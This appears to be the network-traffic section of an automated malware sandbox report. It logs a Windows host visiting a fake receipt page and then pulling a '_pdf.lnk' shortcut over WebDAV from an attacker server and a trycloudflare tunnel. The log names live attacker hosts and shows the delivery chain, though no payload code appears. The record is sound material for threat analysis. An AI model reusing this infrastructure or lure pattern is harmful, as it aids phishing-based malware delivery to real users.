Jan 14, 2025 21:14:21.370295048 CET	184	IN	HTTP/1.1 207 Multi-Status Content-Type: application/xml; charset=utf-8 Date: Tue, 14 Jan 2025 20:14:21 GMT Content-Length: 781 Server: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49803	154.216.17.175	5030

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 21:14:22.199282885 CET	965	IN	HTTP/1.1 207 Multi-Status Content-Type: application/xml; charset=utf-8 Date: Tue, 14 Jan 2025 20:14:22 GMT Content-Length: 781 Server: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 34 2d 31 32 2d 31 38 54 31 39 3a 32 39 3a 35 36 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 33 31 33 34 39 33 36 32 36 38 38 3c 2f 44 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 3c 44 3a 71 75 6f 74 61 2d 61 76 61 69 6c 61 62 6c 65 2d 62 79 74 65 73 3e 33 32 37 30 36 30 34 33 39 30 34 3c 2f 44 3a 71 75 6f 74 61 2d 61 76 61 69 6c 61 62 6c 65 2d 62 79 74 65 73 3e 3c 44 3a 67 [TRUNCATED] Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:resourcetype><D:collection/></D:resourcetype><D:creationdate>2024-12-18T19:29:56Z</D:creationdate><D:quota-used-bytes>31349362688</D:quota-used-bytes><D:quota-available-bytes>32706043904</D:quota-available-bytes><D:getlastmodified>Tue, 14 Jan 2025 20:14:18 GMT</D:getlastmodified><D:displayname>Music</D:displayname><D:lockdiscovery/><D:supportedlock><D:lockentry><D:lockscope><D:exclusive/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry><D:lockentry><D:lockscope><D:shared/></D:lockscope><D:locktype><D:write/></D:locktype></D:lockentry></D:supportedlock></D:prop><D:status>HTTP/1.1 200 OK</D:status></D:propstat></D:response></D:multistatus>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49806	154.216.17.175	5030

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 21:14:22.897486925 CET	184	IN	HTTP/1.1 207 Multi-Status Content-Type: application/xml; charset=utf-8 Date: Tue, 14 Jan 2025 20:14:22 GMT Content-Length: 811 Server: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49813	154.216.17.175	5030

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 21:14:24.471175909 CET	184	IN	HTTP/1.1 207 Multi-Status Content-Type: application/xml; charset=utf-8 Date: Tue, 14 Jan 2025 20:14:24 GMT Content-Length: 811 Server: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.5	49819	154.216.17.175	5030

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 21:14:25.283987999 CET	185	IN	HTTP/1.1 207 Multi-Status Content-Type: application/xml; charset=utf-8 Date: Tue, 14 Jan 2025 20:14:25 GMT Content-Length: 1618 Server: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.5	49825	154.216.17.175	5030

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 21:14:25.301414013 CET	226	OUT	GET /1B20GBSUBNSAFGEVA/1B20GBSUBNSAFGEVA_pdf.lnk HTTP/1.1 Cache-Control: no-cache Connection: Keep-Alive Pragma: no-cache User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045 translate: f Host: alljsnybsafva.living:5030
Jan 14, 2025 21:14:25.971527100 CET	295	IN	HTTP/1.1 200 OK Content-Length: 1932 Last-Modified: Tue, 14 Jan 2025 12:15:06 GMT Content-Type: application/octet-stream Date: Tue, 14 Jan 2025 20:14:25 GMT ETag: "bbb73df992616ab29601db8a8b79febc-1736856906-1932" Accept-Ranges: bytes Server: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.5	49831	154.216.17.175	5030

Timestamp	Bytes transferred	Direction	Data
Jan 14, 2025 21:14:26.715850115 CET	583	IN	HTTP/1.1 404 Not Found Content-Type: text/html; charset=utf-8 Content-Length: 408 Date: Tue, 14 Jan 2025 20:14:26 GMT Server: WsgiDAV/4.3.0 Cheroot/9.0.0 Python/3.11.1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 27 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 27 20 27 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 27 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 27 43 6f 6e 74 65 6e 74 2d 54 79 70 65 27 20 63 6f 6e 74 65 6e 74 3d 27 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 27 3e 0a 20 20 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 20 20 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 20 20 3c 70 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3a 20 2f 31 42 32 30 47 42 53 55 42 4e 53 41 46 47 45 56 41 2f 54 68 75 6d 62 73 2e 64 62 3c 2f 70 3e 0a 3c 68 72 2f 3e 0a 3c 61 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 67 69 74 68 75 62 2e 63 6f 6d 2f 6d 61 72 31 30 2f 77 [TRUNCATED] Data Ascii: <!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01//EN' 'http://www.w3.org/TR/html4/strict.dtd'><html><head> <meta http-equiv='Content-Type' content='text/html; charset=utf-8'> <title>404 Not Found</title></head><body> <h1>404 Not Found</h1> <p>404 Not Found: /1B20GBSUBNSAFGEVA/Thumbs.db</p><hr/><a href='https://github.com/mar10/wsgidav/'>WsgiDAV/4.3.0</a> - 2025-01-14 12:14:26.573219</body></html>

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.5	49714	27.123.25.1	443	1772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 20:14:00 UTC	686	OUT	GET /Receipt536354.php HTTP/1.1 Host: caringforyousupport.com.au Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 20:14:01 UTC	234	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 20:14:01 GMT Server: Apache X-Powered-By: PHP/8.2.19 Upgrade: h2,h2c Connection: Upgrade, close Vary: Accept-Encoding Transfer-Encoding: chunked Content-Type: text/html; charset=UTF-8
2025-01-14 20:14:01 UTC	7958	IN	Data Raw: 34 30 30 30 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 69 63 6f 6e 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 69 6e 61 65 72 6f 2e 63 6f 6d 2f 62 6c 6f 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 36 2f 30 35 2f 62 75 69 6c 64 2d 31 30 31 35 38 2e 70 6e 67 22 3e 0d 0a 0d 0a 3c 6d 65 74 61 20 70 72 6f 70 65 72 74 79 3d 22 6f 67 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 77 69 6e 61 65 72 6f 2e 63 6f 6d 2f 62 6c 6f 67 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 32 30 31 36 2f 30 35 2f 62 75 69 6c 64 2d 31 30 31 35 38 2e 70 6e 67 22 3e 20 0d 0a 20 20 20 20 20 20 20 20 3c 74 69 74 6c 65 3e 31 42 32 30 47 42 53 55 42 4e 53 41 46 47 45 56 41 3c 2f 74 69 74 6c 65 3e 0d 0a 0d 0a 20 20 Data Ascii: 4000<link rel="icon" href="https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png"><meta property="og:image" content="https://winaero.com/blog/wp-content/uploads/2016/05/build-10158.png"> <title>1B20GBSUBNSAFGEVA</title>
2025-01-14 20:14:01 UTC	8432	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2025-01-14 20:14:01 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-14 20:14:01 UTC	8192	IN	Data Raw: 34 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4000
2025-01-14 20:14:01 UTC	8198	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2025-01-14 20:14:01 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-14 20:14:01 UTC	8192	IN	Data Raw: 34 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4000
2025-01-14 20:14:02 UTC	8198	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii:
2025-01-14 20:14:02 UTC	2	IN	Data Raw: 0d 0a Data Ascii:
2025-01-14 20:14:02 UTC	8192	IN	Data Raw: 34 30 30 30 0d 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 4000

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.5	49716	68.183.112.81	443	1772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 20:14:03 UTC	628	OUT	GET /blog/wp-content/uploads/2016/05/build-10158.png HTTP/1.1 Host: winaero.com Connection: keep-alive sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117" sec-ch-ua-mobile: ?0 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 sec-ch-ua-platform: "Windows" Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://caringforyousupport.com.au/ Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 20:14:03 UTC	338	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 14 Jan 2025 20:14:03 GMT Content-Type: image/png Content-Length: 7584 Last-Modified: Sat, 28 May 2016 14:51:48 GMT Connection: close ETag: "5749b084-1da0" Expires: Tue, 14 Jan 2025 20:14:02 GMT Cache-Control: no-cache Strict-Transport-Security: max-age=15768000 Accept-Ranges: bytes
2025-01-14 20:14:03 UTC	7584	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 1d 52 49 44 41 54 78 da ed 5d 4b 8c 65 d7 55 dd 55 5d 76 07 75 bb 69 07 c9 4a 83 64 1c c4 c0 04 45 74 23 21 84 70 a4 b6 c5 10 c5 49 26 01 65 d2 99 10 48 06 21 83 84 64 84 23 45 4c 71 a4 48 64 96 0e 30 b7 8d 19 62 d2 0a 03 04 93 ee 78 14 31 f0 0f 85 04 45 0e ed ee fa bf 7a 6f 73 ef eb fa bc ba ef 9c b3 f7 3e bf 7b df bb 6b 49 d5 55 5d ef 5b ef de bd ce 5e eb ec bd ef 06 33 13 00 00 e3 c4 26 3e 02 00 00 01 00 00 00 02 00 00 00 04 00 00 00 08 00 00 00 10 00 00 00 20 00 00 00 40 00 00 00 80 00 00 00 00 01 00 00 00 02 00 00 00 04 00 00 00 08 00 00 00 10 00 00 00 20 00 00 00 40 00 00 00 80 00 00 Data Ascii: PNGIHDR\rfpHYs~RIDATx]KeUU]vuiJdEt#!pI&eH!d#ELqHd0bx1Ezos>{kIU][^3&> @ @

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.5	49717	68.183.112.81	443	1772	C:\Program Files\Google\Chrome\Application\chrome.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-14 20:14:03 UTC	382	OUT	GET /blog/wp-content/uploads/2016/05/build-10158.png HTTP/1.1 Host: winaero.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br Accept-Language: en-US,en;q=0.9
2025-01-14 20:14:03 UTC	338	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 14 Jan 2025 20:14:03 GMT Content-Type: image/png Content-Length: 7584 Last-Modified: Sat, 28 May 2016 14:51:48 GMT Connection: close ETag: "5749b084-1da0" Expires: Tue, 14 Jan 2025 20:14:02 GMT Cache-Control: no-cache Strict-Transport-Security: max-age=15768000 Accept-Ranges: bytes
2025-01-14 20:14:03 UTC	7584	IN	Data Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 00 09 70 48 59 73 00 00 0b 12 00 00 0b 12 01 d2 dd 7e fc 00 00 1d 52 49 44 41 54 78 da ed 5d 4b 8c 65 d7 55 dd 55 5d 76 07 75 bb 69 07 c9 4a 83 64 1c c4 c0 04 45 74 23 21 84 70 a4 b6 c5 10 c5 49 26 01 65 d2 99 10 48 06 21 83 84 64 84 23 45 4c 71 a4 48 64 96 0e 30 b7 8d 19 62 d2 0a 03 04 93 ee 78 14 31 f0 0f 85 04 45 0e ed ee fa bf 7a 6f 73 ef eb fa bc ba ef 9c b3 f7 3e bf 7b df bb 6b 49 d5 55 5d ef 5b ef de bd ce 5e eb ec bd ef 06 33 13 00 00 e3 c4 26 3e 02 00 00 01 00 00 00 02 00 00 00 04 00 00 00 08 00 00 00 10 00 00 00 20 00 00 00 40 00 00 00 80 00 00 00 00 01 00 00 00 02 00 00 00 04 00 00 00 08 00 00 00 10 00 00 00 20 00 00 00 40 00 00 00 80 00 00 Data Ascii: PNGIHDR\rfpHYs~RIDATx]KeUU]vuiJdEt#!pI&eH!d#ELqHd0bx1Ezos>{kIU][^3&> @ @

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
3	192.168.2.5	49833	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 20:14:26 UTC	164	OUT	OPTIONS / HTTP/1.1 Connection: Keep-Alive User-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045 translate: f Host: scan-interpreted-roman-glad.trycloudflare.com
2025-01-14 20:14:27 UTC	331	IN	HTTP/1.1 200 OK Date: Tue, 14 Jan 2025 20:14:27 GMT Content-Type: text/html; charset=utf-8 Transfer-Encoding: chunked Connection: close CF-Ray: 90204ad96cb80f4d-EWR CF-Cache-Status: DYNAMIC Allow: OPTIONS, HEAD, GET, PROPFIND, DELETE, COPY, MOVE, PROPPATCH, LOCK, UNLOCK dav: 1,2 ms-author-via: DAV Server: cloudflare
2025-01-14 20:14:27 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
4	192.168.2.5	49840	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 20:14:27 UTC	194	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 73 63 61 6e 2d 69 6e 74 65 72 70 72 65 74 65 64 2d 72 6f 6d 61 6e 2d 67 6c 61 64 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: scan-interpreted-roman-glad.trycloudflare.com
2025-01-14 20:14:28 UTC	228	IN	HTTP/1.1 207 Multi-Status Date: Tue, 14 Jan 2025 20:14:28 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 781 Connection: close CF-Ray: 90204ae00a13c34f-EWR CF-Cache-Status: DYNAMIC Server: cloudflare
2025-01-14 20:14:28 UTC	781	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 34 2d 31 32 2d 31 38 54 31 39 3a 32 39 3a 35 36 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 33 31 33 34 39 33 36 32 36 38 38 3c 2f 44 3a Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus xmlns:D="DAV:"><D:response><D:href>/</D:href><D:propstat><D:prop><D:resourcetype><D:collection/></D:resourcetype><D:creationdate>2024-12-18T19:29:56Z</D:creationdate><D:quota-used-bytes>31349362688</D:

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
5	192.168.2.5	49845	104.16.230.132	443

Timestamp	Bytes transferred	Direction	Data
2025-01-14 20:14:28 UTC	194	OUT	Data Raw: 50 52 4f 50 46 49 4e 44 20 2f 20 48 54 54 50 2f 31 2e 31 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 4b 65 65 70 2d 41 6c 69 76 65 0d 0a 55 73 65 72 2d 41 67 65 6e 74 3a 20 4d 69 63 72 6f 73 6f 66 74 2d 57 65 62 44 41 56 2d 4d 69 6e 69 52 65 64 69 72 2f 31 30 2e 30 2e 31 39 30 34 35 0d 0a 44 65 70 74 68 3a 20 30 0d 0a 74 72 61 6e 73 6c 61 74 65 3a 20 66 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 30 0d 0a 48 6f 73 74 3a 20 73 63 61 6e 2d 69 6e 74 65 72 70 72 65 74 65 64 2d 72 6f 6d 61 6e 2d 67 6c 61 64 2e 74 72 79 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 0d 0a 0d 0a Data Ascii: PROPFIND / HTTP/1.1Connection: Keep-AliveUser-Agent: Microsoft-WebDAV-MiniRedir/10.0.19045Depth: 0translate: fContent-Length: 0Host: scan-interpreted-roman-glad.trycloudflare.com
2025-01-14 20:14:28 UTC	228	IN	HTTP/1.1 207 Multi-Status Date: Tue, 14 Jan 2025 20:14:28 GMT Content-Type: application/xml; charset=utf-8 Content-Length: 781 Connection: close CF-Ray: 90204ae4cc9b4223-EWR CF-Cache-Status: DYNAMIC Server: cloudflare
2025-01-14 20:14:28 UTC	781	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 27 31 2e 30 27 20 65 6e 63 6f 64 69 6e 67 3d 27 55 54 46 2d 38 27 3f 3e 0a 3c 44 3a 6d 75 6c 74 69 73 74 61 74 75 73 20 78 6d 6c 6e 73 3a 44 3d 22 44 41 56 3a 22 3e 3c 44 3a 72 65 73 70 6f 6e 73 65 3e 3c 44 3a 68 72 65 66 3e 2f 3c 2f 44 3a 68 72 65 66 3e 3c 44 3a 70 72 6f 70 73 74 61 74 3e 3c 44 3a 70 72 6f 70 3e 3c 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 6f 6c 6c 65 63 74 69 6f 6e 2f 3e 3c 2f 44 3a 72 65 73 6f 75 72 63 65 74 79 70 65 3e 3c 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 32 30 32 34 2d 31 32 2d 31 38 54 31 39 3a 32 39 3a 35 36 5a 3c 2f 44 3a 63 72 65 61 74 69 6f 6e 64 61 74 65 3e 3c 44 3a 71 75 6f 74 61 2d 75 73 65 64 2d 62 79 74 65 73 3e 33 31 33 34 39 33 36 32 36 38 38 3c 2f 44 3a Data Ascii: <?xml version='1.0' encoding='UTF-8'?><D:multistatus 